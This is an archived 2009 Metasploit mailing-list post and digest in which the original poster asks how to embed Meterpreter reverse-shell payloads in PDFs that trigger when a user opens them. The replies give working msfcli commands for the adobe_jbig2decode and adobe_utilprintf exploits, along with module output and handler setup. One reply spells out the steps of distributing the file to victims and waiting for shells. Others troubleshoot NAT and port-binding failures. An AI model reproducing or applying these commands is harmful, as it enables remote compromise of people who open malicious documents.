is it possible to attach metasploit payloads

[abhishek.luck at gmail.com (Abhishek Kumar)]

hi list,

the suggested methods of injecting payloads in pdf files are
application specific (adobe acrobat reader).
can we have a generic pdf which is loaded with msf payloads and
waiting for the user action ??

abhi

On Sun, Mar 29, 2009 at 9:06 PM,
<framework-request at spool.metasploit.com> wrote:
> Send Framework mailing list submissions to
> ? ? ? ?framework at spool.metasploit.com
>
> To subscribe or unsubscribe via the World Wide Web, visit
> ? ? ? ?https://mail.metasploit.com/mailman/listinfo/framework
> or, via email, send a message with subject or body 'help' to
> ? ? ? ?framework-request at spool.metasploit.com
>
> You can reach the person managing the list at
> ? ? ? ?framework-owner at spool.metasploit.com
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Framework digest..."
>
>
> Today's Topics:
>
> ? 1. Re: is it possible to attach metasploit payloads withpdf
> ? ? ?(wfdawson at bellsouth.net)
> ? 2. Re: is it possible to attach metasploit payloads withpdf
> ? ? ?(Anastasios Monachos)
> ? 3. Re: is it possible to attach metasploit payloads withpdf (Natron)
> ? 4. Re: is it possible to attach metasploit payloads withpdf
> ? ? ?(wfdawson at bellsouth.net)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Sun, 29 Mar 2009 20:14:05 +0000
> From: wfdawson at bellsouth.net
> Subject: Re: [framework] is it possible to attach metasploit payloads
> ? ? ? ?withpdf
> To: framework at spool.metasploit.com
> Message-ID:
> ? ? ? ?<032920092014.4078.49CFD68D0004C16300000FEE22243429029B0A02D2089B9A019C04040A0DBF02019C990E0B0099 at att.net>
>
> Content-Type: text/plain; charset="us-ascii"
>
>
>
> ?Hi,
>
> I tried your suggestion. ?I have a NAT'ed connection to the Internet where connections to my external address are 
> mapped one-to-one to my internal address. ?With the following:
>
> ./msfcli exploit/windows/fileformat/adobe_jbig2decode filename=test2.pdf payload=windows/meterpreter/reverse_tcp 
> LHOST=x.x.x.x LPORT=443 E
>
> ...where x.x.x.x is my actual Internet visible IP address, I obtained the following response:
>
> [*] Please wait while we load the module tree...
> [*] Handler binding to LHOST 0.0.0.0
> [-] Bind failed on 0.0.0.0
> [*] Handler binding to LHOST x.x.x.x
> [-] Bind failed on x.x.x.x
> [-] Exploit failed: Cannot assign requested address - bind(2)
>
> Is there a way to make this work in my situation?
>
>
> ?-------------- Original message from Mirko Iodice <m.iodice at gmail.com>: --------------
>
>
> > try:
> >
> > ./msfcli exploit/windows/fileformat/adobe_utilprintf
> > filename=document.pdf payload=windows/meterpreter/reverse_tcp
> > lhost=x.x.x.x lport=5555 E
> >
> > 2009/3/28 Abhishek Kumar :
> > > hi list,
> > >
> > > yesterday i was working around attaching a meterpreter reverse_tcp
> > > payload to a MS word document.
> > > It was simple to do because msfpayload provides payloads in VBA format.
> > >
> > > Now,the question is...
> > > is there anything available for pdf files ?> can we embed our payloads with pdf and then wait for the user to 
> > > click on it
> > ??
> > > regards
> > > abhi
> > > _______________________________________________
> > > https://mail.metasploit.com/mailman/listinfo/framework
> >
> >
> >
> > --
> > Mirko Iodice
> > _______________________________________________
> > https://mail.metasploit.com/mailman/listinfo/framework
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090329/24b1cff1/attachment-0001.htm>
>
> ------------------------------
>
> Message: 2
> Date: Sun, 29 Mar 2009 21:46:03 +0100
> From: Anastasios Monachos <anastasiosm at gmail.com>
> Subject: Re: [framework] is it possible to attach metasploit payloads
> ? ? ? ?withpdf
> To: framework at spool.metasploit.com
> Message-ID:
> ? ? ? ?<8d90bdd80903291346x47df3beco43a9b6fa5c232449 at mail.gmail.com>
> Content-Type: text/plain; charset="utf-8"
>
> Have tested the following with Adobe Acrobat Reader 9.0.0
>
> tasos at hostnet:~/Programs/framework-3.2$ ./msfcli
> exploit/windows/fileformat/adobe_jbig2decode
> FILENAME=jbig2decode.1.102-5555.pdf PAYLOAD=windows/meterpreter/reverse_tcp
> LHOST=attacker_ip LPORT=5555 E
> [*] Please wait while we load the module tree...
> [*] Handler binding to LHOST 0.0.0.0
> [*] Started reverse handler
> [*] Creating 'document102-5555.pdf' file...
> [*] Generated output file
> /home/r0b/Programs/framework-3.2/data/exploits/document102-5555.pdf
>
> 1. Have ready the multi/handler running with
> windows/meterpreter/reverse_tcp, with LHOST attacker_ip and LPORT 5555
> 2. Distribute the created file to your victims
> 3. and wait for shells to launch
> ----or----
> msf > use ?windows/fileformat/adobe_jbig2decode
> msf exploit(adobe_jbig2decode) > set PAYLOAD windows/meterpreter/reverse_tcp
> msf exploit(adobe_jbig2decode) > set LHOST attacker_ip
> msf exploit(adobe_jbig2decode) > set LPORT 5555
> LPORT => 5555
> msf exploit(adobe_jbig2decode) > exploit
> [*] Handler binding to LHOST 0.0.0.0
> [*] Started reverse handler
> [*] Creating 'msf.pdf' file...
> [*] Generated output file
> /home/tasos/Programs/framework-3.2/data/exploits/msf.pdf
> [*] Exploit completed, but no session was created.
>
> now follow 1,2,3 as before
>
>
>
> Regarding the error received by fdawson at bellsouth.net :
> ....
> [-] Bind failed on x.x.x.x
> [-] Exploit failed: Cannot assign requested address - bind(2)
>
> Check if you have enough permissions on your system, also check if the LPORT
> is already bound.
>
>
> 2009/3/28 Nicolas Krassas <krasn at ans.gr>
>
> > Trying this one i couldn't really make it to succeed. Anybody has positive
> > results on this ?
> >
> > Dinos
> >
> > ----- Original Message ----- From: "rogue" <wullie19 at ntlworld.com>
> > To: <framework at spool.metasploit.com>
> > Cc: "Abhishek Kumar" <abhishek.luck at gmail.com>
> > Sent: Saturday, March 28, 2009 12:39 PM
> > Subject: Re: [framework] is it possible to attach metasploit payloads
> > withpdf
> >
> >
> >
> > ?Theres also the new one
> > > adobe_jbig2decode.rb.
> > >
> > > -rogue
> > >
> > >
> > > ?hi list,
> > > > yesterday i was working around attaching a meterpreter reverse_tcp
> > > > payload to a MS word document.
> > > > It was simple to do because msfpayload provides payloads in VBA format.
> > > >
> > > > Now,the question is...
> > > > is there anything available for pdf files ?
> > > > can we embed our payloads with pdf and then wait for the user to click on
> > > > it ??
> > > >
> > > > regards
> > > > abhi
> > > > _______________________________________________
> > > > https://mail.metasploit.com/mailman/listinfo/framework
> > >
> > > _______________________________________________
> > > https://mail.metasploit.com/mailman/listinfo/framework
> > _______________________________________________
> > https://mail.metasploit.com/mailman/listinfo/framework
>
>
>
> --
> AM
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090329/4859ef59/attachment-0001.htm>
>
> ------------------------------
>
> Message: 3
> Date: Sun, 29 Mar 2009 15:53:25 -0500
> From: Natron <natron at invisibledenizen.org>
> Subject: Re: [framework] is it possible to attach metasploit payloads
> ? ? ? ?withpdf
> To: "wfdawson at bellsouth.net" <wfdawson at bellsouth.net>
> Cc: "framework at spool.metasploit.com" <framework at spool.metasploit.com>
> Message-ID:
> ? ? ? ?<D6D4DD46-5F7A-409B-AE38-185C511D0553 at invisibledenizen.com>
> Content-Type: text/plain; ? ? ? charset=us-ascii; ? ? ? format=flowed; ?delsp=yes
>
> Are you running it as root? You can't bind to 443 on a 'normal' account.
>
> N
>
> On Mar 29, 2009, at 3:14 PM, wfdawson at bellsouth.net wrote:
>
> > ?Hi,
> >
> > I tried your suggestion. ?I have a NAT'ed connection to the Internet
> > where connections to my external address are mapped one-to-one to my
> > internal address. ?With the following:
> >
> > ./msfcli exploit/windows/fileformat/adobe_jbig2decode
> > filename=test2.pdf payload=windows/meterpreter/reverse_tcp
> > LHOST=x.x.x.x LPORT=443 E
> >
> > ...where x.x.x.x is my actual Internet visible IP address, I
> > obtained the following response:
> >
> > [*] Please wait while we load the module tree...
> > [*] Handler binding to LHOST 0.0.0.0
> > [-] Bind failed on 0.0.0.0
> > [*] Handler binding to LHOST x.x.x.x
> > [-] Bind failed on x.x.x.x
> > [-] Exploit failed: Cannot assign requested address - bind(2)
> >
> > Is there a way to make this work in my situation?
> >
> >
> > -------------- Original message from Mirko Iodice
> > <m.iodice at gmail.com>: --------------
> >
> >
> > > try:
> > >
> > > ./msfcli exploit/windows/fileformat/adobe_utilprintf
> > > filename=document.pdf payload=windows/meterpreter/reverse_tcp
> > > lhost=x.x.x.x lport=5555 E
> > >
> > > 2009/3/28 Abhishek Kumar :
> > > > hi list,
> > > >
> > > > yesterday i was working around attaching a meterpreter reverse_tcp
> > > > payload to a MS word document.
> > > > It was simple to do because msfpayload provides payloads in VBA
> > format.
> > > > Now,the question is...
> > > > is there anything available for pdf files ? > can we embed our
> > payloads with pdf and then wait for the user to click on it
> > > ??
> > > > regards
> > > > abhi
> > > > _______________________________________________
> > > > https://mail.metasploit.com/mailman/listinfo/framework
> > >
> > >
> > >
> > > --
> > > Mirko Iodice
> > > _______________________________________________
> > > https://mail.metasploit.com/mailman/listinfo/framework
> > _______________________________________________
> > https://mail.metasploit.com/mailman/listinfo/framework
>
>
> ------------------------------
>
> Message: 4
> Date: Sun, 29 Mar 2009 21:05:39 +0000
> From: wfdawson at bellsouth.net
> Subject: Re: [framework] is it possible to attach metasploit payloads
> ? ? ? ?withpdf
> To: "framework at spool.metasploit.com" <framework at spool.metasploit.com>
> Message-ID:
> ? ? ? ?<032920092105.24920.49CFE2A2000C957F0000615822218865869B0A02D2089B9A019C04040A0DBF02019C990E0B0099 at att.net>
>
> Content-Type: text/plain; charset="us-ascii"
>
>
>
> ?Yes, I am running it as root. ?The "problem" would appear to be that my call to msfcli cannot bind to the x.x.x.x 
> address as that is not my interface's actual address. ?My address is y.y.y.y which is NAT'ed to x.x.x.x. ?I should 
> not care about that from my side. ?The client can certainly connect to x.x.x.x which then is connected to me by NAT...
> ?-------------- Original message from Natron <natron at invisibledenizen.org>: --------------
>
>
> > Are you running it as root? You can't bind to 443 on a 'normal' account.
> >
> > N
> >
> > On Mar 29, 2009, at 3:14 PM, wfdawson at bellsouth.net wrote:
> >
> > > ?Hi,
> > >
> > > I tried your suggestion. ?I have a NAT'ed connection to the Internet
> > > where connections to my external address are mapped one-to-one to my
> > > internal address. ?With the following:
> > >
> > > ./msfcli exploit/windows/fileformat/adobe_jbig2decode
> > > filename=test2.pdf payload=windows/meterpreter/reverse_tcp
> > > LHOST=x.x.x.x LPORT=443 E
> > >
> > > ...where x.x.x.x is my actual Internet visible IP address, I
> > > obtained the following response:
> > >
> > > [*] Please wait while we load the module tree...
> > > [*] Handler binding to LHOST 0.0.0.0
> > > [-] Bind failed on 0.0.0.0
> > > [*] Handler binding to LHOST x.x.x.x
> > > [-] Bind failed on x.x.x.x
> > > [-] Exploit failed: Cannot assign requested address - bind(2)
> > >
> > > Is there a way to make this work in my situation?
> > >
> > >
> > > -------------- Original message from Mirko Iodice
> > > : --------------
> > >
> > >
> > > > try:
> > > >
> > > > ./msfcli exploit/windows/fileformat/adobe_utilprintf
> > > > filename=document.pdf payload=windows/meterpreter/reverse_tcp
> > > > lhost=x.x.x.x lport=5555 E
> > > >
> > > > 2009/3/28 Abhishek Kumar :
> > > > > hi list,
> > > > >
> > > > > yesterday i was working around attaching a meterpreter reverse_tcp
> > > > > payload to a MS word document.
> > > > > It was simple to do because msfpayload provides payloads in VBA
> > > format.
> > > > > Now,the question is...
> > > > > is there anything available for pdf files ? > can we embed our
> > > payloads with pdf and then wait for the user to click on it
> > > > ??
> > > > > regards
> > > > > abhi
> > > > > _______________________________________________
> > > > > https://mail.metasploit.com/mailman/listinfo/framework
> > > >
> > > >
> > > >
> > > > --
> > > > Mirko Iodice
> > > > _______________________________________________
> > > > https://mail.metasploit.com/mailman/listinfo/framework
> > > _______________________________________________
> > > https://mail.metasploit.com/mailman/listinfo/framework
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090329/7d4a7512/attachment.htm>
>
> ------------------------------
>
> _______________________________________________
> Framework mailing list
> Framework at spool.metasploit.com
> https://mail.metasploit.com/mailman/listinfo/framework
>
>
> End of Framework Digest, Vol 14, Issue 35
> *****************************************